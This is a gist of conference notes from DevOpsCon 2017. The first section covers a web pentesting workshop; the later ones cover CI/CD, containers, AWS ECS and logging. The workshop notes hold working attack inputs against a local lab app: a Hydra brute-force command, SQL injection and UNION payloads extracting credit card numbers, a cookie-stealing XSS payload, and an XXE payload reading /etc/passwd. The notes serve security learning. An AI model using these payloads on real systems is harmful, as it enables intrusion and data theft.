Skip to content

Instantly share code, notes, and snippets.

@jahe
Last active January 8, 2019 21:01
DevOpsCon 2017 Notes

Glossar

A/B Testing - Two groups of users (A and B) interact with different versions of the app (e.g. Design is different). The version with a better conversion rate wins.


Monday

09:30 - 17:00 (Salon 4) - Web Hacking: Pentesting and attacking Web Apps

http://christian-schneider.net/downloads/Toolbased_WebPentesting.pdf FindBugs + FindSecurityBugs - Plugins in Eclipse

CVE

CVE-ID - One vulnerabilty in a CVE registry. It includes a score CVEDetails.com - Publicly known vulnerabilites e.g. Tomcat 7.0.61: https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-887/version_id-190760/Apache-Tomcat-7.0.61.html

  • Search by version numbers
Exploit Database

exploit-db.com Exploits with code ready to use (i.e. a python code snippit to trigger this vulnerability)

exploits.shodan.io

Nikto

Scans the WebServer Checks for vulnerble files

> nikto -h http://localhost:8080

Exceutes tousands of HTTP requests to check weather there are vulnerable stuff (not exploiting -> rather fingerprinting)

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          127.0.0.1
+ Target Hostname:    localhost
+ Target Port:        8080
+ Start Time:         2017-06-12 04:19:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /examples/servlets/index.html, fields: 0xW/7139 0x1427457886000 
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7677 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-06-12 04:19:52 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Intercepting Proxy
  • THE Pentestesters/Hackers IDE
  • Local Proxy Server -> Configure any kind of web client (i.e. browser) -> All this traffic emited by this client goes through this proxy
  • Proxies HTTP and HTTPS traffic
  • Sniffs the network
  • Intercepts Web traffic
  • Put us into command to better attack the server
  • We can also route this proxy with our smartphone (inspect mobile apps talking to a backend REST-API)
OWASP ZAP
  • Intercepting Proxy
  • There is a Plugin for ZAP to import a Swagger definition file: zaproxy/zaproxy#2034
  1. Change the Port to another port (Tools > Options > Local Proxy): 4711
  2. Set Proxy in Firefox (empty the "No Proxy for" stuff)
  3. Request to our webserver
  4. See the requests in ZAP
  5. Toggle to intercepting Mode (Breakpoint mode)
  6. Request to our webserver
  7. Go to the Break tab
  8. Change the payload of the request in this tab
  9. Hit "Go to next Breakpoint" (Play button)
  10. Hit "Show hiden fields" (lightbulp) - Shows all hidden fields in the webbrowser

Passive Scan Mode (default as it is invasive)

  • Tab "Alerts"
  • Shows possible vulnerabilites
Active Scan Mode - "Scan as you surf"-Mode
  • Attacking while traversing through the application
  • It automatically injects SQL + XSS stuff and permutates on every input vectors in each request
  • There is a Jenkins Plugin which executes a ZAP Active Scan in a headless mode
  • You can export a HTML Report of the active scan
  1. Right Click in ZAP on the Site: Add to Context > Add to default context
  2. Now the site has a target symbol
  3. Click ATTACK Mode (HINT: Now you are in "Scan as you surf"-Mode)
  4. Now it is attacking (in the Active Scan Tab)
  5. Now click on a Link on the webpage
  6. Now it scans this new site
  7. When you go to the previous site it doesn't get scanned again

Active Mode Settings

  • Scan Policy - How deep should the scan reach (Analyze > Scan Policy Managers)
  • Active Scan Input Vectors - (Tools > Options)

Plugins

  • Advanced SQLInjection Scanner (derived by SQLMap) --> Every active scan includes this SQLMap stuff
Arachni
  • http://www.arachni-scanner.com/
  • CLI
  • Not part of Kali Linux by default
  • Point to your test system and let it run
  • Ruby based
  • can serve a UI
  • Provides a headless PhantomJS based browser cluster (takes a lot of resources)
    • A scan takes long (so execute it only in a nighly build)
  • It is better at spidering JavaScript based apps than ZAPs spider
  • You can provide a login script
  • Nice HTML Report
Crack admin PW via bruteforce with the tool "Hydra"
  • CLI-Tool
  • Services inside Hydra: Bruteforcing those services
  • Bruteforce with a password list as a seed
    • There are password lists inside of Kali Linux: /usr/share/wordlists/rockyou.txt.gz
    • Or on GitHub: danielmiessler/SecLists
  1. Login request on our site (proxied through our ZAP)
  2. Take a look at the request in ZAP
  3. Use the form input fields on the request header as our seed
  4. Use top-pw-cracking-list.txt
  5. > hydra

hydra -t 4 (number of threads running) -f (stop on the first finding) -l admin (user to bruteforce) -P top-pw-cracking-list.txt (pw list) localhost (host) -s 8080 (port) http-post-form (service) "/marathon/secured/j_security_check: j_username=^USER^%j_password=^PASS^: Wrong"

Wrong is the expected response body

> hydra -t 2 -f -l admin -P top-pw-cracking-list.txt localhost -s 8080 http-post-form "/marathon/secured/j_security_check:
j_username=^USER^%j_password=^PASS^:
Wrong"

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-12 05:31:37
[DATA] max 2 tasks per 1 server, overall 64 tasks, 1001 login tries (l:1/p:1001), ~7 tries per task
[DATA] attacking service http-post-form on port 8080
[8080][http-post-form] host: localhost   login: admin   password: password
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-12 05:31:38
SQL-Injection
  • Java: Easy to fix with prepared statements

Possible Injection Strings

  • '
  • or 1=1 --
  • and 'a'='a
  • etc. quoted and unquoted

Boolean Blind test (to an unquoted SQL-Injection -> No ' is needed)

  1. Request to http://localhost:8080/marathon/showResults.page?marathon=2
  2. Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=1
  3. Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=2

Within the Code with the String concatenated SQL query

  • marathonId is "tainted" as it comes from the outside
  • finishedFilter isn't "tainted"

Find out table and column names

  • By selecting meta tables/views (i.e. PG_TABLES in PostgreSQL)
  • By using UNION
    • SELECT ... FROM ... WHERE UNION SELECT ... FROM ... WHERE ...
    • Prerequites for our UNION
      • Same number of columns that the original SELECT has
      • Same datatypes that the original SELECT has
    • Use null because null is datatype independent: SELECT null, null...
    • The Resulting Injection String: UNION SELECT null, null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
    • Use the "--" at the end to comment the rest of the query out
    • Shifting a String 'X' around in the select until we find a String is ok for that column as a datatype: UNION SELECT 'X', null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
      • When we found a matching column: Get the column datatype and the column name by inserting the following instead of the 'X':
        • ???
      • We can select the credit card numbers with the following:
        • UNION SELECT credit_card_number, null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
Blind SQL-Injection exploitation
  • Determine table names or other columns values by using db timings with ASCII() and Sleep() functions and CASE WHEN within the WHERE statement.
    • If the first char has an ASCII number lower than 100, then sleep 3 seconds. When the requests now runs 3 seconds you know, that the first char is an ASCII char between 0 - 100. Thereby we can determin the exact char.

sqlmap

Source and Sink (= Senke)

source - Source of malicous data. Everything coming from a request (input vector / what a attacker can modify) sink - You have 100% control over the arguments

Source finds a way into a sink --> Vulnerabilty

Taint Tracking - Trace the request from source to sink Taint Flow - ???

Cross-Site Scripting (XSS)
  • Top 3 in OWASP Top 10
  • With XSS we can do everything a user can do

Three Types of XSS

  1. Reflected XSS - Directly reflected in the browser after inserting a vulnerable String (Just one user interaction)
  2. Persistent XSS - The malicous code sits inside the db and pops up on every refresh
  3. DOM based XSS - JavaScript based

<img src="//localhost/myimg.png" onload=src="//localhost/log.jsp?value="document.cookie</img>

HttpOnly - Can be set on cookies so that they can't be read by (malicous) JavaScript

Escape out of an attribute (i.e. title)

  • <button title="Inserted the value of 2">Back</button>
    • <script>alert(1)</script> would result in: <button title="Inserted the value of <script>alert(1)</script>">Back</button>
    • But with "><script>alert(1)</script> it result in: <button title="Inserted the value of "><script>alert(1)</script>">Back</button>
Beef
  • Ruby based tool
  • Browser Exploitation Framework
  • Abuse XSS vulnerabilites
  • Provides a UI (with Ext JS)
  • Victims browser sets up a WebSocket connection to the Beef server
  • The attacker sees the online clients in the UI
  • The attacker can executes stuff on the client + read values out of forms etc.
Open Bug Bounty
  • openbugbounty.org
  • Publicly known XSS vulnerabilites of websites
XML eXternal Entities

Uploading an XML file

  • Include an inline DTD to the XML --> The XML parser reads the /etc/passwd file and shows writes it to the XML:
<!xml ...>

<!DOCTYPE test [
    <!ENTITY cool SYSTEM "file:///etc/passwd">
]>

<myType>
    &cool;
</myType>
OWASP
  • Best Practices how to Pentest
  • Top 10 Vulnerabilites
  • Non-Profit organizatiion
  • They are providing an "Intercepting Proxy" OWASP-ZAP (already inside Kali Linux)
WHAT WE HAVE TO DO ON OUR APPLICATIONS
  • HTTPS everywhere
  • Don't mix Data with Code (i.e. String concate a SQL query with variables inside)
  • Don't store files uploaded by users in the filesystem --> Use the DB with Lobs instead

Tuesday

09:00 - 09:30 (SAAL MARITIM B/C) - Reception and Opening

09:30 - 10:00 (SAAL MARITIM B/C) - Crossing the River by feeling the Stones

10:15 - 11:15 (SAAL MARITIM B/C) - Challenges in Release Management for complex and highly regulated Environments

What drives DevOps?

  • We have to be faster than before
  • Cloud
  • Multi-Channel (i.e. Voice-Channel: Alexa)
  • Time-to-Market (automated release approach)

Complex dev environment

  • A lot of agile teams
  • Separate release streams
  • Different technology stacks with different tools
  • Dependencies between applications

Regulations

  • PCI - WHAT!?
  • SAE - WHATTTT
  • FDA - Hmm?
  • Automotive Spice - WTF?

Core Principles

  • Traceability
  • Responsibility
  • Audit-Save - Not changeable

What do we have to do?

  • Efficient delivery framework
  • Make the toolchain changeable (i.e. does your Toolchain support serverless in the future)
  • Higher agility (i.e. Product Managers have to work more agile)
  • Communicate successes/achievements inside of the company (i.e. Testers didn't know that there is an automated provisioning system for test platforms)

Requirements on our toolchain

  • The pipeline process has to be visible
  • Dependency Management
  • Quality Gates
  • Cross Pipeline reporting
  • ...

Problem: 300 - 400 Tasks vom Stages from dev to prod

5% from 1.000.000 deployments reach production

  • Why? Because they missed quality Gates in the pipeline

How to do it with so many tools?

  • Dev > Build > Integrate > Test > Release > Deploy > Operate
  • What is the market leader to do all these things
    • Most companies do it with an Excel list (document the Release Process with start/end dates, durations, team members for each individual application)
      • They require weekly + daily release meetings
      • The Release Manager asks you: Is this or that done yet? - No because we have to wait for another person outside of the team to do stuff
  • Integrate everything in the release process
  • Change Management DB - What has been released etc.

The Big Picture

  • Release Pipeline Diagram
  • Two different Artifactories for intern and production
  • ...

AWS + CloudFoundry + OpenStack

  • Pipeline
    • -> Internal Cloud (CF + OpenStack)
    • -> AWS
    • -> ...

Pipeline for a Pipeline

  • Development Pipeline --- All pipeline changes are tested first ---> Production Pipeline

Self service onboarding (What?! :D)

  • Diagram
  • Developers
    • -> XL-Release (AppName, GitHub Repo, etc. provided by the developers)
      • -> Pipeline

X-File - A Groovy DSL to define your Release Pipeline by XL-Release

  • Defines Phases
    • Has a Task (i.e. to wait for something (QA))
    • Has Dependencies

XL-Release profides a Web UI

  • A Board for a Release (Flow - For Business People)
  • A calendar with planned releases and their dependencies (i.e. sb has to install a test system on a machine)
  • This UI tries to replace an Excel Sheet
  • It also tries to replace E-Mail
  • Compliance
    • Rights Management (Who can start/abort a release etc.)
    • Auditing
    • Reporting - Who did what?
    • Traceability - Where are we in the release process?

How to deploy

  1. Deploy to a cluster
  2. Make a smoke test

CD Books tell you: When there is an error -> Don't fix the symtoms -> "Press the red button" -> Fix the source of the error -> Retrigger a new deployment

12:00 - 13:00 (SALON 7) - Don’t crash the Sandmann – continuously build, test and deploy on OTC

Customer: RBB

  • rbb-online.de
  • rbb24.de
  • Problem: Millions of requests on the news page (Beim Terroranschlag)
    • --> Buy new HW or go in the cloud
  • There are High Peaks on the "Sandmann - Webpage" on the Sandmann show running in TV
  • They shifted in the OTC

Load Testing with Monitoring

  • CLI Monitoring Tool: Taurus
  • Visible as a graph in the CLI
    • 20 concurrent users
    • 20 active users
  • nload - CLI Tool that monitors the current network traffic (In and Outgoing) on the console
  • Jenkins Slave on the OTC triggers the Load Test
    • Produces an XML Report with a Graph of all the instances running over time

Taurus

  • CLI tool
  • Can trigger JMeter
  • Configure in YAML file --> ??? Does it produce a JMeter config ???
    • Define concurrent clients firing requests
    • Define scenarios
      • Requests to http://...
    • Define Reporting
      • Define Criteria when to fail the test (i.e. max response time)
  • Tests an Auto Scaling Group in the OTC

JMeter

  • Don't use GUI mode for load testing
  • There is a headless mode to run the load test
  • Configuration + Scripting is bad in the GUI, better do it with Taurus' YAML file

OTC - Based on OpenStack

  • Auto Scaling
    • Multiple Groups
      • With multiple Instances
  • Hosted in Magdeburg and Biere

RBB

  • Images are built on the OTC with Ansible via Jenkins and are published in a private registry
  • Automated Load- and Performance Testing
  • Webcaching Layer on OTC
    • HAProxy

OpenStack

  • Growing echo system

Pets vs. Cattle - ???

Jump Host - ???

VPC - ???

ECS - Elastic Cloud Server

  • Name
  • Type
  • Number of vCPUs
  • Memory
  • Image Type
  • Image
  • Network
    • Which VPC
    • IPs

Public Images (Latest OS Base Image) -> git Repo (managed by DevOps Team) -> Development VCS (Temp. Server v1) -> Private Images (Custom Server Image v1) -> Production VCS (Ephemeral Server v1)

Automated Testing

  1. Change to the Code (Git checkin)
  2. Pipeline is triggered
  3. Image is created
  4. Functional Image is created
  5. Image is deployed on the OTC

Overview

  • Jenkins Master in Customer Site
  • Git Repo in Customer Site
  • Jenkins Slave in VPC
  • A VPC for Testing
  • A VPC for Production

Rolling Update (Updates without any Downtime)

  1. Change the config in one Auto Scaling Group
  2. A new instance with the new config is starting up
  3. Now two instances are running in the same Auto Scaling Group
  4. The new instance shows the new content
  5. Trigger the down-scaling in the UI
  6. Now only the new version is live

14:15 - 14:45 (SAAL MARITIM B/C) - Enabling Agility at Scale for the heavily regulated

ING (Bank)

The last agile mile

2012

  • Commerce
  • Application dev
  • Applicatino ops
  • Infra dev
  • Infra ops

2013

  • Commerce
  • Agile / Scrum
  • Application ops
  • Infra dev
  • Infra ops

2014

  • Commerce
  • DevOps (CD) 118 Teams
  • Infra dev
  • Infra ops

2015

  • BizDevOps (Tribes & Squads) 400 Teams
  • Infra dev
  • Infra ops

2016

  • BizDevOps (Manual IT Risk + Private Cloud)
  • Infra ops

IT-Risk

  • Policy
  • Principle
  • Control Framework
  • Pipeline

Principles

  • Speed - No longer fill out forms
  • Outcomes over Impositions
    • Outcome - Not a filled in form, but meetings
  • Shift-Left - Nobody patches apps in production without going through QA
  • Human vs. Robots
  • Immutable Servers
  • Cattle and Pets
    • Pet - Server in Prod -> Go to the doctor when its sick
    • Cattle - Get another one when it is sick
  • Infrastructure = Code
    • Robots = software
    • Humans leverage automate pipelines

Learning organization

  • Weird assumptions about the roles of a software engineer
    • Designer
    • Coder
    • Tester
    • Deployer
    • Requirements Specifier
    • Solution Architect
    • ...
  • ING changed HR

Complex Apps are best managed with Feedback loops

Feedback Loops

  • Need to be designed

BizDevSecRiskOps

  • Shift Left

Twitter: @henkkolk

15:00 - 16:00 (SAAL MARITIM B/C) - Continuous Delivery with Jenkins in the real World

They moved from Jenkins 1 to Jenkins 2 with CD

Contious Delivery vs Contiious Deployment

  • Continous Delivery - Before Production (you can do this by merging in master branch, build your artifact, but can not go in production)
  • Continous Deployment - Go in Production

Diagram

  • Handler (Entry Point: It is time to do st.) (i.e a git merge)
  • VM or Container that is clean and is similar to your production system: A place to run your tests
  • Tests failed - do something (i.e. open an issue)
  • Tests ok - do something

Continous Delivery

  • Increase the number of releases
  • Build > deploy code in a safe env > run test > deploy

Continous Integration

  • Integrate new code in the old code: is the new code compliant to the old code
  • Run security tests in this phase
  • GitHub let Jenkins check wheather the new code is compliant (merge button is disabled when it is not)

Why use Continous Delivery?

  • Stay focused on Business
  • Reduce human errors - circle that repeats over time (we as human are not good at those tasks -> boring)
  • Configure Jenkins to send notififactions to your communication channel of choice (i.e. Slack, Telegram or E-Mail)
  • Keep developers focused

Terminology

  • Release
  • Artifact/Artefact
  • Pipeline - Tunnel that our code follows from the VCS to the environment (Define it via a Jenkinsfile)
  • Continous delivery
  • Continous Integration
  • Continous deployment
  • Rollback - Deploy can fail / can break the system. Hard topic. When st breaks: start from the beginning of an old version of git (Complex systems: Snapshots)
  • CI server - Jenkins
  • Job - Single Pipeline that starts when code is merged

Unique Pipeline

  • Has to be unique

Speedy

  • Make your pipeline fast (i.e. split your pipeline / parallelize your pipeline)
    • Smoke tests when merge to master parallel to static analyzation the code

Reproducible

  • You can reproduce the env on your local environment

Versionable

  • Change is lost in Jenkins when someone comes along and changes the settings of a Jenkins job --> Bad.
  • Jenkins Pipeline Plugin - Pipeline "Hascode"???: Put a file in your VCS that updates the settings via a git merge. It grows with your application (It is comfortable to rollback)

Track! Track! Track!

  • Monitor the productivity and mark your important steps
  • Mark a deploy to understand the changes
    • Red vertical lines in a graph which (Grafana) marks a new deploy to see how a new version behaves (compare it in an easy way)
  • Organize a party :D

Communication Layer

  • Goal: Keep Guys out of Jenkins

Create Strong integration

  • Work hard to maintain your pipeline efficient

Staging Environment - Improvements

  • 4 Environments
  • A new PR is opened
    • Job: PR Checker (3 minutes)
    • Periodic Job that runs the unit tests with code coverage (split it with PR Checker to have the pipeline fast) (18 minutes)
  • Merged to devlop
    • Job: Artifact Creator Job - Creats the artifact
      • triggers: Job: Staging - Copies artifact + start secondary tomcat
  • Testing begins
  • Post Staging Acceptance
    • Job: Deploy Pre Production (1 minute)
  • Testing Complete
    • Job: Release to Production (25 sec)
  • Sanity Checks Complete
    • Job: Merge (2 minutes)
    • Job: Release

His Workflow

  1. Merge feature branch to develop
  2. run unit test + run static analysis + docker build + deploy to acceptance
  3. merge develop to master (if 2. is working)
  4. run unit test + run static analysis + docker build + deploy to production

His Opimizations to his workflow

  • Merge to master and use the same docker image in dev and prod
  • Snapshot rollback

Jenkis Server is the unique door to release to production

  • monitor - Monitor your servers
  • logs - tail logs
  • recovery - jenkins can fail --> Have a recovery system
  • HA -
  • scalability - Jenkins support multi node environment with Jenkins workers (scale your jenkins by adding new nodes)
  • ❤️ your CD process

Backup / Restore policy

  • What happens during disaster?
  • Are we able to recover?
  • He backups JENKINS_HOME excluded plugins
  • There are plugins for that but he uses scripts to do it

Pipeline as code

  • Groovy DSL
  • Script it rather than configure it in the jenkins UI
node {
    stage("Checkout") {
        git branch: "master",
        credentialsId: "github-asdf",
        ....
    }
}

Trigger a build with Hubot

  • Built by GitHub
  • Chat with the robot. It takes the message and deploys it
  • JavaScript + NodeJS
  • Slack has a public protocol

Blueocean

  • New UI for Jenkins
  • It is a plugin for Jenkins
  • New fancy way to manage pipelines

(Jenkins) Plugins as code

  • It is not easy to do
  • Specify a list of plugins that you need
  • Bash Script: install-plugins.sh (look it up on GitHub)
    • Reads the file with all the plugins that you specified and installs them in Jenkins
    • Problem: Plugin Versions

@gianarb http://gianarb.it

16:45 - 17:45 (SAAL MARITIM B/C) - Continuous Delivery with Containers: The Good, the Bad, and the Ugly

OReilly Book: "Containerizing Continous Delivery in Java"

Containers + CD

  • Push st. (Container Image) down the pipeline that has to be the same (no veriations)
  • Adding meta data to container images is vital

Continous Delivery

  • Book "Continous Delivery"
  • Not "necissarily" Continous Deployment
  • A Build Pipeline is mandatory
  • DEV > QA > STAGING > PROD

Containers + CD

  • Container image == 'single binary' - the single thing that gets down the pipeline (like a .war)
  • Impacts QA (no longer pulling down a .war or .jar) and Production

Pipeline for Containers

  • Local should be like produciton as possible
  • Locally use same Image like in production (Alpine vs. CentOS etc. --> Decide!)

Telepresence

  • Tool when working with Kubernetes
  • Work locally and running on a cluster

Hoverfly

  • Tool to mock out APIs
  • Doing this by recording or simulating traffic
  • Synthetic APIs to work locally

Dockerfile (super important) - ??? One Dockerfile for local development and production ???

  • OS choice
  • Configuration
  • Build artifacts
  • Exposig ports
  • Language specific stuff
    • JDK vs JRE + Oracle vs OpenJDK

Different Test and Prod Containers?

  • DB in the Test Container
  • Better use "test sidecar container" with all the other tools that use need (Selenium etc.) - Look up the Blogpost on this slide!
  • Docker multi-stage builds - Interessing Idea

Building images with Jenkins

  • CloudBee has nice OpenSource Plugins for Jenkins to build Images

Storing in an image registry

  • DockerHub

Metadata - Adding data as it goes down the pipeline

  • Who built it etc.
  • Version your Images
  • "Latest" Tag in Docker
    • HINT! It means the last build tag that run without a specific tag/version specified!
    • DONT USE LATEST: Everytime version it with a version
  • Application Metadata
    • Version (semver)
    • GIT SHA
  • Build metadata
    • build data + image name + vendor
  • ...
    • QA control
    • Security audited
  • Adding Lables at build time
    • Docker Lables
  • Labelling (look it up on GitHub)
    • Create file '/hooks/labels'
  • You can add data on build time
  • label-schema.org
  • microbadger.com
  • Adding Labels at runtime can be done...
    • docker run -d --label (that will commit the label in the docker image --> but it does create a new image)
    • Best solution: A registry with metadata support: JFrog Artifactory or NexusOSS (Modify the metadata in the registry rather than in the image itself)

Component Testing

Testing: Jenkins Pipelines (as code with a Jenkinsfile --> Creates the Job out of this file)

  • Baked into jenkins
  • node { stage("asdf) ... }
  • Stages are shown in Jenkins

Testing individual containers

node {
    stage("asdf") {
        docker.image()....
        waitFor... // wait 30 until /health endpoint returns "UP"
    }
}

Docker Compose + Jenkins Pipeline

node {
    stage('end-to-end tests') {
        ...
        sh docker-compose ...
    }
}

Testing NFRs has to be in the build pipeline!!!

  • Performance + Load testing
    • Gatling (Scala based DSL: Better than JMeter) / JMeter
    • Flood.io - commercial product takes your Gatlin Script and spins up Amazon Machines
  • Security testing
    • Findsecbugs / OWASP Dependency Check
    • Bdd-security (Wrapper around OWASP ZAP) / Arachni (More JavaScript Pen-Testing tool -> Covers the basics)
    • GauntIt / Serverspec
    • Docker Bench for Security / CoreOS Clair

Delaying NFRs to the "Last Responsible Moment"

  • "We are agile" so we can implement security checks and stuff later... --> WRONG!

Mechanical sympathy: Docker and Java

  • JVM takes half of the RAM of the machine (doesn't work in a Docker container)
  • Memory Problems
    • Container 2GB Memory == Heap 2GB Memory...No, Don't give all the RAM to one container!!!
  • Entropy Problems (when no periphical device is plugged in --> It cannot generate random security stuff in Java)
  • TEST those Things in your Pipeline!!!

Observability is core to continous delivery

  • READ! InfoQ: The Challenge of Monitoring Containers at Scale

Containers are not a silver bullet

Container Platform

  • OpenShift is nice for that
  • Book: Infrastructure as Code

Summary

  • Continous Delivery is vital
  • Container Images must be the single source of truth within pipeline
    • Metadata added in the pipeline
  • Mechanical symphaty is important
  • ...

Books

  • Continous Delivery
  • Building Microservices
  • Microservices
  • More Agile Testing
  • ... look them up on the slides

DevOps Weekly Newsletter

@danielbryantuk

18:15 - 19:15 (SAAL MARITIM A) - Deliver Docker Containers continuously with ECS

ECS Cluster

  • Includes Container Instances with an ECS-Agent (Docker container as well)
  • ECS-Agents communicate with AWS to start new instances if needed

ECS Cluster - Deployment Options

  • AWS Console
    • Easy to start
    • UI on the Website
  • AWS CLI
    • Not easy to start
    • Automation is possible
    • A script can get complicated an very verbose (not what we want)
  • ECS CLI
    • It is easy to start
    • Automation is possile
    • Via one command a cluster is up
    • But use not in production
  • Cloud Formation
    • YAML File -> Send this to the CF Service -> Does the things that need to be done
    • Changes to this File result in the required changes
    Parameters:
      KeyName:
        ...
    Resources:
      ECSCluster:
        ...
      ECSAutoScalingGroup:
        ...
      ...
    ...
    

ECR - The Docker registry in the AWS

The first deployment

  • Describe the container on first deployment
    • Image
    • Port mapping
    • Mount points
    • Network options
    • Docker options
  • Task Definition - Contains Containers
    • IAM Task Role ???
    • Volumes
    • Network Mode
    • Task Placement Constraints
  • Service Description - Contains a Task
    • Loadbalancer
    • AutoScaling - Based on metrics: Please scale up etc.
    • Deployment Configuration
    • Task Placement Strategy

ECS CLI can consume a Docker Compose File that generates a Task Definition based on that

Load Balancing

  • Static Port Mapping in the old Loadbalancer (ELB) (Not the best solution for containers)
  • New Loadbalancer (Application Load Balancer (ALB)) - Only HTTP - Define Rules etc.
    • Provides Dynamic Port Mapping

Scaling (Up & Down)

  • CI1
    • T1
    • T2
    • T3

When an alarm happens (In the Task Definition): Scale up

  • CI1
    • T1
    • T2
    • T3
  • CI2
    • T4

AutoScaling: Rule of Thumb

  • Threshold = (1 - max(Container Reservation) / Total Capacity of a single Container Instance) * 100)

One Metric to scale them all

Node Draining

  • Is needed when a new version of the application is available

Best Practices for Continous Delivery

  • ASG UpdatePolicy: Wait for resource signals
  • cfn-init: Ensure Docker and ECS-Agent is running
  • UserData: Use build number to enforce new EC2 instances

Volumes

  • Not supported or built in :(
  • 2 Options: EBS and EFS
    • EBS - No automatically scaling
    • EFS - Elastic File System - It scales automatically - Pay what you need

Security

  • IAM Security Roles
  • iam.cloudonaut.io

ECS-Agent creates Tasks and talks to them via iptables

  • Tasks shouldn't connect to the Metadata service

What is missing here?

  • Monitoring
  • ...

His wishlist for AWS

  • Support all docker features (i.e. HEALTHCHECK)
  • SecurityGroups for Containers
  • Support Volumns natively
  • ...

boards.greenhouse.io/scout24

@pgarbe

20:00 - 20:45 (SAAL MARITIM B/C) - Dependency Hell, Monorepos and beyond

Netflix provides a client.jar for other services

  • So they can reference it in their build.gradle file as a dependency
  • This client.jar has dependencies as well and pulls them in the current service

Netflix uses Artifactory from JFrog

Solutions to the version problem

  • deal with it
  • share nothing or little
  • Monorepo
    • all code in a single repo
    • no versions

Netflix' approach to this problem

  • Astrid - Checks from artifactory which project uses which dependency in which version
  • Niagra - pulls in the new version of a jar to all the dependent projects an checks wheather there is a break in those projects
    • When a project is ok with the new version, niagra updates the version of this dependency in this projects VCS and triggers a build pipeline to check wheather it works --> Then a PR is getting issued on those projects

@sonofgarr

Wednesday

10:15 - 11:15 - Monitoring and Log Management for Docker, Swarm and Kubernetes

Centralized Log Management - Receiving the Log in raw format and save it first

  • Where do you store your logs from your application (Log4j etc.) --> Configure them to write to files / stdout --> Docker is a change as it writes to stdout and stderr
  • Logformat: Human readable, but we want to have structured data
    • How to get structured date with human readable format?
    • Logshippers do collect files
    • Log Parsers use regexps to parse the logs
    • When structured we can put it to ElasticSearch
    • Bulk Indexing with ElasticSearch
  • After Indexing the logs are searchable

Server/Container/App -> Log Shippers -> Centralized Log Management / Logsene

Monitoring

  • similar: even more tools are involved
  • Collect the metrics periodically and ship them to a backend -> Time Series DB

Server + App /Container Configuration -> Monitoring Agents -> Time Series DB -> Dashboard Tools, Alerting Tools, ChatOps Tools

Time Series DB

  • find the minimum value over time

On Top on Time Series DB there are visualization tools

  • i.e. Graphana / Kibana
  • Slack Channels for Alerting

Decision in the first place

  • bound to the Time Series DB

Nice Diagram of "Logging Features" with a lot of tools! Look it up in the slides!!!

Kubernetes

  • Pod - One or multiple Containers
  • 1 Pod with 2 Containers (i.e. Kibana + ElasticSearch) --> Both on the same Host (communication via localhost ports) --> ReplicationController: Does the Job of
  • Services: Entry Point via the network to the server (similar to exposing port in docker) -> goes over the load balancer
  • AutoScaling
  • CLI Tools for it (easy to setup an ElasticSearch Cluster)

Kubernetes Dashboard / Heapster

  • Real time information
  • Heapster: real time API --> Provides Performance Metrics for every pod and container

docker stack deploy (distributed containers) --> swarm creates an overlay network (can run on different hosts --> this is not possible in Kubernetes)

Kubernetes != Swarm

  • Kubernetes has much things to learn
    • Kubernetes better for larger companies with more teams

Docker Logging

  • Docker Logging Drivers
  • Drivers are set up by Kubernetes
  • From Docker: other Options as a Logging Driver:
    • JournalD, etc...
    • Default: JSON --> works
    • If using syslog as driver: doesn't save the logs locally (it has no buffer -> Risky: prefer Filedriver and forwarding them!!!!)
  • docker logs container_id
  • docker logs container_name
  • Syslog Driver:
    • docker run --log-driver=syslog ...
  • Add Context in the docker run command with --log-opt (ImageName, etc.)
  • More fun with TCP logging drivers:
    • docker logs syslog
  • Splunk Logging Driver
  • Alternatives to improve the situation of problematic logging drivers:
    • Logs as JSON
    • When ElasticSearch or syslog server is not available: Have an (smart) Agent that buffers the logs (Disk Buffer)
    • Log Agent - something like logstash

Tagging of logs metrics and events

  • Automatic tagging with:
    • Docker
      • container name
      • image name
      • labges / environments
      • host name + ip (on which node is the container running)
    • kubernetes
      • pod name, UID, namespace
    • Swarm
      • swarm service name, id, compose project, container # scale

Container Metrics Collection

  • docker stats ${docker ps -q}
  • Monitoring Agents use this metrics and ship them to the backend

LogRouting: For Teams: Label their containers with an Index

Integrate application monitoring in the stack

  • Service Discorery
    • etcd
    • Consul
    • or API's

Docker --run -> App Container (config to expose metrics) <-- App Monitor <--Automatic Run-- Docker Monitor <--discovery-- Docker

Key Container Metrics

  • Node Storage - Good Docker OPS clean up their disks by removing the unused containers --> Alarm for Disk problems is important
  • Number of containers per host - verify deployment strategies
  • CPU quota per container - when we run more container on one node (limit them)
  • Container memory and OOM counter - tune your app memory stuff like you do it for your container (JVM arguments have to match)
  • Docker Events - Network connects, docker pulls, (auditing: what happend during the deployment process of the container -> which container was deployed in which version in which time?)
  • Swarm Task Task - (Only for swarm) Pending Tasks

Limit container resources for your apps

  • Set cpu quotas with: cpu-quota=6000
  • limit Memory an configure app in container to the same limits!
  • disable swap: ???some option???
  • ...

Automatic Deployment of monitoring Agents

  • One command to run a service on each node joining the cluster

